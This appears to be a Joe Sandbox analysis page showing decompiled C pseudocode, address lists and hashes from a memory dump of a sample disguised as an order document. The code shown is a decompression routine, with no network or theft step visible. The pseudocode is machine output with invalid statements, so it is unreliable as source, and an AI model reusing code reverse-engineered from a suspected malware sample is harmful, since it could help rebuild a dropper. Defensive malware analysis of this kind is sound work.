												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													goto L79;
												}
												goto L155;
											}
											 *((intOrPtr*)(__ebp - 0x88)) = 0x1c;
											goto L153;
										}
									}
									goto L155;
								}
								 *((intOrPtr*)(__ebp - 0x88)) = 0xc;
								goto L153;
							case 0xd:
								L37:
								__eflags =  *(__ebp - 0x6c);
								if( *(__ebp - 0x6c) == 0) {
									 *((intOrPtr*)(__ebp - 0x88)) = 0xd;
									goto L153;
								} else {
									__ecx =  *(__ebp - 0x70);
									__eax =  *(__ebp - 0xc);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
									__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
									 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
									 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
									_t122 = __ebp - 0x70;
									 *_t122 =  *(__ebp - 0x70) + 1;
									__eflags =  *_t122;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
									L39:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
										while(1) {
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t170 = __edx + 1; // 0x1
												__ebx = _t170;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												continue;
											} else {
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *((intOrPtr*)(__ebp - 0x88)) = 0xe;
													goto L153;
												} else {
													__ecx =  *(__ebp - 0x70);
													__eax =  *(__ebp - 0xc);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
													__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
													 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
													 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													_t156 = __ebp - 0x70;
													 *_t156 =  *(__ebp - 0x70) + 1;
													__eflags =  *_t156;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													continue;
												}
											}
											goto L155;
										}
										goto L54;
									} else {
										__eflags = __ebx - 0x100;
										if(__ebx >= 0x100) {
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											L55:
											__al =  *(__ebp - 0x44);
											 *(__ebp - 0x5c) =  *(__ebp - 0x44);
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *((intOrPtr*)(__ebp - 0x88)) = 0x1a;
												goto L153;
											} else {
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												L78:
												 *(__ebp - 0x14) = __edx;
												L79:
												 *((intOrPtr*)(__ebp - 0x88)) = 2;
												goto L1;
											}
										} else {
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										}
									}
								}
								goto L155;
						}
					}
					L154:
					_t501 = _t500 | 0xffffffff;
					goto L155;
				}
			}

0x00406b5a
0x00406b60
0x00406b64
0x00406b68
0x00406b72
0x00406b80
0x00406e59
0x00406e60
0x00406e8d
0x00406e91
0x00000000
0x00000000
0x00406e9c
0x00406ea2
0x00406ea5
0x00406ea8
0x00406eab
0x00406eae
0x00406eb4
0x00406ecd
0x00406ed0
0x00406edc
0x00406edd
0x00406ee0
0x00406eb6
0x00406eb6
0x00406ec5
0x00406ec8
0x00406ec8
0x00406eea
0x00406e8a
0x00406e8a
0x00406e8a
0x00000000
0x00406eec
0x00406e69
0x00406fa1
0x00406fab
0x00406fb3
0x00406fba
0x00406fbc
0x00406e6f
0x00406e75
0x00406e7c
0x00406e84
0x00406e84
0x00406e87
0x00000000
0x00406e87
0x00406e69
0x00406fc3
0x00406fc7
0x00406fc7
0x00406efe
0x00406f01
0x00406e0d
0x00406e0d
0x00406e0d
0x004065a9
0x004065a9
0x004065a9
0x004065b2
0x00000000
0x00000000
0x004065b8
0x00000000
0x004065c3
0x00000000
0x004065c9
0x004065cc
0x004065cf
0x004065d2
0x004065d6
0x00000000
0x004065dc
0x004065dc
0x004065df
0x004065e1
0x004065e2
0x004065e5
0x004065e7
0x004065e8
0x004065ea
0x004065ed
0x004065f2
0x004065f7
0x00406600
0x00406613
0x00406616
0x00406622
0x0040664a
0x0040664c
0x0040664e
0x00406651
0x00406652
0x00406652
0x0040664e
0x0040665a
0x0040665e
0x00000000
0x00406624
0x00406628
0x0040662d
0x0040662d
0x00406636
0x0040663e
0x00406641
0x00000000
0x00406647
0x00406647
0x00000000
0x00406647
0x00406641
0x00406622
0x004065d6
0x00000000
0x00000000
0x00406664
0x00406664
0x00406668
0x00406f14
0x00000000
0x0040666e
0x00406671
0x00406681
0x00406684
0x00406687
0x00406687
0x00406687
0x0040668a
0x0040668e
0x00000000
0x00406690
0x00406690
0x00406696
0x004066c0
0x004066c6
0x004066cd
0x00000000
0x00406698
0x0040669c
0x0040669f
0x004066a4
0x004066a4
0x004066af
0x004066b7
0x004066ba
0x00000000
0x00000000
0x00000000
0x00000000
0x004066ba
0x00406696
0x0040668e
0x00000000
0x00000000
0x004066ff
0x00406705
0x00406708
0x00406715
0x0040671d
0x00000000
0x00000000
0x004066d4
0x004066d4
0x004066d8
0x00406f23
0x00000000
0x004066de
0x004066e4
0x004066ef
0x004066ef
0x004066ef
0x004066f2
0x004066f5
0x004066f8
0x004066fd
0x00000000
0x00000000
0x00000000
0x00000000
0x004066fd
0x00000000
0x00000000
0x00406d94
0x00406d94
0x00406d9a
0x00406da0
0x00406da6
0x00406dc0
0x00406dc3
0x00406dc9
0x00406dd4
0x00406dd4
0x00406dd6
0x00406da8
0x00406da8
0x00406db7
0x00406dbb
0x00406dbb
0x00406de0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406de2
0x00406de6
0x00406f95
0x00000000
0x00406dec
0x00406df2
0x00406df9
0x00406e01
0x00406e04
0x00406e07
0x00406e07
0x00000000
0x00406e07
0x00000000
0x00000000
0x00406725
0x00406727
0x0040672a
0x0040679b
0x0040679e
0x004067a1
0x004067a8
0x004067b2
0x00000000
0x0040672c
0x0040672c
0x00406730
0x00406733
0x00406735
0x00406738
0x0040673b
0x0040673d
0x00406740
0x00406742
0x00406747
0x0040674a
0x0040674d
0x00406751
0x00406758
0x0040675b
0x00406762
0x00406766
0x0040676e
0x0040676e
0x0040676e
0x00406768
0x00406768
0x00406768
0x0040675d
0x0040675d
0x0040675d
0x00406772
0x00406775
0x00406793
0x00406795
0x00406968
0x00406968
0x0040696b
0x0040696e
0x00406971
0x00406974
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406983
0x00406986
0x0040699e
0x004069a1
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ae
0x004069b0
0x00406988
0x00406988
0x00406990
0x00406995
0x00406997
0x00406999
0x00406999
0x004069b3
0x004069ba
0x004069bd
0x00000000
0x004069bf
0x0040693b
0x0040693f
0x00406f47
0x00000000
0x00406945
0x00406945
0x00406948
0x0040694b
0x0040694f
0x00406952
0x00406958
0x0040695a
0x0040695a
0x0040695a
0x0040695d
0x00000000
0x0040695d
0x0040693f
0x00000000
0x00406960
0x00406960
0x00406960
0x00000000
0x00406777
0x00406777
0x0040677a
0x0040677d
0x00406780
0x00406782
0x00406782
0x00406782
0x00406785
0x00406788
0x0040678a
0x0040678b
0x0040678e
0x00000000
0x0040678e
0x00406775
0x00000000
0x00000000
0x004069c4
0x004069c8
0x004069e6
0x004069e9
0x004069f0
0x004069f3
0x004069f6
0x004069f9
0x004069fc
0x004069ff
0x00406a01
0x00406a08
0x00406a09
0x00406a0b
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a19
0x00000000
0x004069ca
0x004069ca
0x004069cd
0x004069d0
0x004069da
0x004069da
0x00000000
0x00000000
0x00406a2e
0x00406a32
0x00406a55
0x00406a58
0x00406a5b
0x00406a65
0x00406a34
0x00406a34
0x00406a37
0x00406a3a
0x00406a3d
0x00406a4a
0x00406a4d
0x00406a4d
0x00000000
0x00000000
0x00406a71
0x00406a75
0x00000000
0x00406a7b
0x00406a7b
0x00406a7f
0x00000000
0x00406a85
0x00406a85
0x00406a87
0x00406a8e
0x00406a92
0x00406a95
0x00406a99
0x00406f5f
0x00000000
0x00406a9f
0x00406a9f
0x00406aa2
0x00406aa5
0x00406aa8
0x00406aaa
0x00406aaa
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abd
0x00406abf
0x00406abf
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406acb
0x00406acb
0x00406acb
0x00406ace
0x00000000
0x00406ace
0x00406a99
0x00406a7f
0x00000000
0x00000000
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af3
0x00406afd
0x00406ae8
0x00406ae8
0x00000000
0x00406ae8
0x00000000
0x00000000
0x00406b09
0x00406b0d
0x00406b14
0x00406b17
0x00406b1a
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b1d
0x00406b20
0x00406b23
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2c
0x00406b2f
0x00406b36
0x00406b3b
0x00406a1c
0x00406a1c
0x00406a1f
0x00406d91
0x00406d91
0x00000000
0x00000000
0x00406bc9
0x00406bc9
0x00406bc9
0x00406bcd
0x00000000
0x00000000
0x00406bd3
0x00406bd6
0x00406bd9
0x00406bdd
0x00406be0
0x00406be6
0x00406be8
0x00406be8
0x00406be8
0x00406beb
0x00406bee
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf4
0x00406bf8
0x00000000
0x00000000
0x00406bfa
0x00406bfd
0x00406bff
0x00406c02
0x00406c05
0x00406c08
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c13
0x00406c16
0x00406c1d
0x00000000
0x00406c1f
0x00000000
0x00406c1f
0x00000000
0x00406c1d
0x00406c24
0x00406c26
0x00406c2d
0x00406c30
0x00406c33
0x00406c33
0x00406c38
0x00406c3a
0x00406c3d
0x00406c44
0x00406c47
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00000000
0x00000000
0x00406c7c
0x00406c82
0x00406c85
0x00406c88
0x00406c8b
0x00406c8e
0x00406c91
0x00406c94
0x00406c97
0x00406c9a
0x00406c9d
0x00406cb6
0x00406cb8
0x00406cbb
0x00406cbc
0x00406cbf
0x00406cc1
0x00406cc4
0x00406cc6
0x00406cc8
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd4
0x00406cd6
0x00406cd6
0x00406cd7
0x00406cda
0x00406cdd
0x00406c9f
0x00406c9f
0x00406ca7
0x00406cac
0x00406cae
0x00406cb1
0x00406cb1
0x00406ce0
0x00406ce7
0x00406c71
0x00406c71
0x00406c71
0x00406c71
0x00000000
0x00406ce9
0x00406c4c
0x00406c50
0x00406f77
0x00000000
0x00406c56
0x00406c56
0x00406c59
0x00406c5c
0x00406c60
0x00406c63
0x00406c69
0x00406c6b
0x00406c6b
0x00406c6b
0x00406c6e
0x00000000
0x00406c6e
0x00406c50
0x00000000
0x00406ce7
0x00406cee
0x00406cee
0x00406cee
0x00406cf1
0x00406cf1
0x00406cf1
0x00406cf4
0x00406cf7
0x00406cf9
0x00406f83
0x00000000
0x00406cff
0x00406cff
0x00406d02
0x00000000
0x00406d08
0x00406d08
0x00406d0c
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d12
0x00406d12
0x00406d16
0x00000000
0x00000000
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d27
0x00406d27
0x00406d27
0x00406d2a
0x00406d2d
0x00406d30
0x00406d33
0x00406d36
0x00406d39
0x00406d3a
0x00406d3c
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d42
0x00406d45
0x00406d48
0x00406d4b
0x00406d4f
0x00406d51
0x00406d54
0x00000000
0x00406d56
0x00000000
0x00406d56
0x00000000
0x00406d54
0x00406f89
0x00000000
0x00406f89
0x00406d02
0x00000000
0x00406cf9
0x00406f6b
0x00000000
0x00000000
0x004067be
0x004067be
0x004067c2
0x00406f2f
0x00000000
0x004067c8
0x004067c8
0x004067cb
0x004067ce
0x004067d2
0x004067d5
0x004067db
0x004067dd
0x004067dd
0x004067dd
0x004067e0
0x004067e3
0x004067e3
0x004067e6
0x004067e9
0x0040689c
0x0040689c
0x004068a2
0x00000000
0x00000000
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068bf
0x004068c2
0x004068da
0x004068dd
0x004068e0
0x004068e3
0x004068e3
0x004068e6
0x004068ea
0x004068ec
0x004068c4
0x004068c4
0x004068cc
0x004068d1
0x004068d3
0x004068d5
0x004068d5
0x004068ef
0x004068f6
0x004068f9
0x00000000
0x004068fb
0x00406877
0x0040687b
0x00406f3b
0x00000000
0x00406881
0x00406881
0x00406884
0x00406887
0x0040688b
0x0040688e
0x00406894
0x00406896
0x00406896
0x00406896
0x00406899
0x00000000
0x00406899
0x0040687b
0x00000000
0x004068f9
0x00000000
0x004067ef
0x004067ef
0x004067f5
0x00406900
0x00406900
0x00406900
0x00406900
0x00406904
0x00406904
0x00406907
0x0040690a
0x0040690e
0x00406f53
0x00000000
0x00406914
0x00406914
0x00406917
0x0040691a
0x0040691d
0x00406920
0x00406923
0x00406926
0x00406928
0x0040692b
0x0040692e
0x00406931
0x00406933
0x00406933
0x00406933
0x00406ad0
0x00406ad0
0x00406ad3
0x00406ad3
0x00000000
0x00406ad3
0x004067fb
0x004067fb
0x004067fb
0x004067ff
0x00406802
0x00406805
0x00406808
0x0040680b
0x0040680c
0x0040680f
0x00406811
0x00406817
0x0040681a
0x0040681d
0x00406820
0x00406823
0x00406826
0x00406829
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406855
0x00406859
0x0040685b
0x0040685f
0x0040682b
0x0040682b
0x0040682f
0x00406837
0x0040683c
0x0040683e
0x00406840
0x00406840
0x00406862
0x00406869
0x0040686c
0x00000000
0x00406872
0x00000000
0x00406872
0x0040686c
0x004067f5
0x004067e9
0x00000000
0x00000000
0x004065b8
0x00406fc0
0x00406fc0
0x00000000
0x00406fc0

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
Instruction ID: 6855221002494b765214394805571b816b3a2b1c2e31bdc36608bad3b484bcdf
Opcode Fuzzy Hash: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
Instruction Fuzzy Hash: FEA13271E00229CBDF28CFA8C8446ADBBB1FF44305F15856EE816BB281C7795A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406D5B Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406D5B() {
				void _t501;
				signed int _t502;
				signed int _t503;
				signed int _t535;
				signed int* _t573;
				void* _t580;

				if( *(_t580 - 0x40) != 0) {
					 *(_t580 - 0x84) = 0x13;
					_t573 =  *((intOrPtr*)(_t580 - 0x58)) + 2;
					goto L121;
				} else {
					__eax =  *(__ebp - 0x4c);
					 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
					__ecx =  *(__ebp - 0x58);
					__eax =  *(__ebp - 0x4c) << 4;
					__eax =  *(__ebp - 0x58) + __eax + 4;
					 *(__ebp - 0x58) = __eax;
					 *(__ebp - 0x40) = 3;
					 *(__ebp - 0x7c) = 0x14;
					__eax =  *(__ebp - 0x40);
					 *(__ebp - 0x50) = 1;
					 *(__ebp - 0x48) =  *(__ebp - 0x40);
					while(1) {
						if( *(__ebp - 0x48) <= 0) {
							break;
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							L134:
							_t458 = __ebp - 0x48;
							 *_t458 =  *(__ebp - 0x48) - 1;
							continue;
						} else {
							if( *(__ebp - 0x6c) == 0) {
								 *((intOrPtr*)(__ebp - 0x88)) = 0x18;
								L155:
								_t535 = 0x22;
								memcpy( *(_t580 - 0x90), _t580 - 0x88, _t535 << 2);
								_t503 = 0;
							} else {
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t455 = __ebp - 0x70;
								 *_t455 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L134;
							}
						}
						goto L157;
					}
					__ecx =  *(__ebp - 0x40);
					__ebx =  *(__ebp - 0x50);
					0 = 1;
					__eax = 1 << __cl;
					__ebx =  *(__ebp - 0x50) - (1 << __cl);
					__eax =  *(__ebp - 0x7c);
					 *(__ebp - 0x44) = __ebx;
					L129:
					 *(_t580 - 0x88) = _t501;
					while(1) {
						L1:
						_t502 =  *(_t580 - 0x88);
						if(_t502 > 0x1c) {
							break;
						}
						switch( *((intOrPtr*)(_t502 * 4 +  &M00406FC8))) {
							case 0:
								if( *(_t580 - 0x6c) == 0) {
									goto L155;
								} else {
									 *(_t580 - 0x6c) =  *(_t580 - 0x6c) - 1;
									 *(_t580 - 0x70) =  &(( *(_t580 - 0x70))[1]);
									_t502 =  *( *(_t580 - 0x70));
									if(_t502 > 0xe1) {
										goto L156;
									} else {
										_t506 = _t502 & 0x000000ff;
										_push(0x2d);
										asm("cdq");
										_pop(_t537);
										_push(9);
										_pop(_t538);
										_t576 = _t506 / _t537;
										_t508 = _t506 % _t537 & 0x000000ff;
										asm("cdq");
										_t571 = _t508 % _t538 & 0x000000ff;
										 *(_t580 - 0x3c) = _t571;
										 *(_t580 - 0x1c) = (1 << _t576) - 1;
										 *((intOrPtr*)(_t580 - 0x18)) = (1 << _t508 / _t538) - 1;
										_t579 = (0x300 << _t571 + _t576) + 0x736;
										if(0x600 ==  *((intOrPtr*)(_t580 - 0x78))) {
											L10:
											if(_t579 != 0) {
												do {
													_t579 = _t579 - 1;
													 *((short*)( *(_t580 - 4) + _t579 * 2)) = 0x400;
												} while (_t579 != 0);
											}
											 *(_t580 - 0x48) =  *(_t580 - 0x48) & 0x00000000;
											 *(_t580 - 0x40) =  *(_t580 - 0x40) & 0x00000000;
											goto L15;
										} else {
											if( *(_t580 - 4) != 0) {
												GlobalFree( *(_t580 - 4));
											}
											_t502 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t580 - 4) = _t502;
											if(_t502 == 0) {
												goto L156;
											} else {
												 *((intOrPtr*)(_t580 - 0x78)) = 0x600;
												goto L10;
											}
										}
									}
								}
								goto L157;
							case 1:
								L13:
								__eflags =  *(_t580 - 0x6c);
								if( *(_t580 - 0x6c) == 0) {
									 *(_t580 - 0x88) = 1;
									goto L155;
								} else {
									 *(_t580 - 0x6c) =  *(_t580 - 0x6c) - 1;
									 *(_t580 - 0x40) =  *(_t580 - 0x40) | ( *( *(_t580 - 0x70)) & 0x000000ff) <<  *(_t580 - 0x48) << 0x00000003;
									 *(_t580 - 0x70) =  &(( *(_t580 - 0x70))[1]);
									_t45 = _t580 - 0x48;
									 *_t45 =  *(_t580 - 0x48) + 1;
									__eflags =  *_t45;
									L15:
									if( *(_t580 - 0x48) < 4) {
										goto L13;
									} else {
										_t514 =  *(_t580 - 0x40);
										if(_t514 ==  *(_t580 - 0x74)) {
											L20:
											 *(_t580 - 0x48) = 5;
											 *( *(_t580 - 8) +  *(_t580 - 0x74) - 1) =  *( *(_t580 - 8) +  *(_t580 - 0x74) - 1) & 0x00000000;
											goto L23;
										} else {
											 *(_t580 - 0x74) = _t514;
											if( *(_t580 - 8) != 0) {
												GlobalFree( *(_t580 - 8));
											}
											_t502 = GlobalAlloc(0x40,  *(_t580 - 0x40)); // executed
											 *(_t580 - 8) = _t502;
											if(_t502 == 0) {
												goto L156;
											} else {
												goto L20;
											}
										}
									}
								}
								goto L157;
							case 2:
								L24:
								_t521 =  *(_t580 - 0x60) &  *(_t580 - 0x1c);
								 *(_t580 - 0x84) = 6;
								 *(_t580 - 0x4c) = _t521;
								_t573 =  *(_t580 - 4) + (( *(_t580 - 0x38) << 4) + _t521) * 2;
								goto L121;
							case 3:
								L21:
								__eflags =  *(_t580 - 0x6c);
								if( *(_t580 - 0x6c) == 0) {
									 *(_t580 - 0x88) = 3;
									goto L155;
								} else {
									 *(_t580 - 0x6c) =  *(_t580 - 0x6c) - 1;
									_t67 = _t580 - 0x70;
									 *_t67 =  &(( *(_t580 - 0x70))[1]);
									__eflags =  *_t67;
									 *(_t580 - 0xc) =  *(_t580 - 0xc) << 0x00000008 |  *( *(_t580 - 0x70)) & 0x000000ff;
									L23:
									 *(_t580 - 0x48) =  *(_t580 - 0x48) - 1;
									if( *(_t580 - 0x48) != 0) {
										goto L21;
									} else {
										goto L24;
									}
								}
								goto L157;
							case 4:
								L122:
								_t499 =  *_t573;
								_t556 = _t499 & 0x0000ffff;
								_t532 = ( *(_t580 - 0x10) >> 0xb) * _t556;
								if( *(_t580 - 0xc) >= _t532) {
									 *(_t580 - 0x10) =  *(_t580 - 0x10) - _t532;
									 *(_t580 - 0xc) =  *(_t580 - 0xc) - _t532;
									 *(_t580 - 0x40) = 1;
									_t500 = _t499 - (_t499 >> 5);
									__eflags = _t500;
									 *_t573 = _t500;
								} else {
									 *(_t580 - 0x10) = _t532;
									 *(_t580 - 0x40) =  *(_t580 - 0x40) & 0x00000000;
									 *_t573 = (0x800 - _t556 >> 5) + _t499;
								}
								if( *(_t580 - 0x10) >= 0x1000000) {
									goto L128;
								} else {
									goto L126;
								}
								goto L157;
							case 5:
								L126:
								if( *(_t580 - 0x6c) == 0) {
									 *(_t580 - 0x88) = 5;
									goto L155;
								} else {
									 *(_t580 - 0x10) =  *(_t580 - 0x10) << 8;
									 *(_t580 - 0x6c) =  *(_t580 - 0x6c) - 1;
									 *(_t580 - 0x70) =  &(( *(_t580 - 0x70))[1]);
									 *(_t580 - 0xc) =  *(_t580 - 0xc) << 0x00000008 |  *( *(_t580 - 0x70)) & 0x000000ff;
									L128:
									_t501 =  *(_t580 - 0x84);
									goto L129;
								}
								goto L157;
							case 6:
								__edx = 0;
								__eflags =  *(__ebp - 0x40);
								if( *(__ebp - 0x40) != 0) {
									__eax =  *(__ebp - 4);
									__ecx =  *(__ebp - 0x38);
									 *(__ebp - 0x34) = 1;
									 *((intOrPtr*)(__ebp - 0x84)) = 7;
									__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
									goto L121;
								} else {
									__eax =  *(__ebp - 0x5c) & 0x000000ff;
									__esi =  *(__ebp - 0x60);
									__cl = 8;
									__cl = 8 -  *(__ebp - 0x3c);
									__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
									__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
									__ecx =  *(__ebp - 0x3c);
									__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
									__ecx =  *(__ebp - 4);
									(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
									__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
									__eflags =  *(__ebp - 0x38) - 4;
									__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
